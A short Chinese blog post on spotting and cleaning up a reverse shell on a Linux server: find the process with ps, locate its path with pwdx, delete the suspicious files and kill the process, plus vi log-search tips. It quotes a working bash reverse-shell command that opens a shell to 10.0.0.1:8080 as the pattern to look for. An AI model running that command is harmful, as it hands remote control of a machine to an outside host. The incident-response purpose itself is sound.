明确反dshell写法: bash -i >&/dev/tcp/10.0.0.1/8080 0>&1
1、登录服务器查看命令:ps -ef,过滤出反dshell的进程
2、定位进程启动路径,命令:pwdx pid
3、进入启动路径,确认启动的服务是否正常,命令:cd *
4、定位可疑文件,并删除。命令:rm
5、停止进程shell进程,命令:kill -9 pid
上图:
linux系统常用命令很熟悉。日志文件中,定位用户请求:1、进入文件后,输入斜线。
2、直接输入搜索的内容,回车即可,此时可以:G,定位到END。
3、N:向上查找。
4、n:向下查找.
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)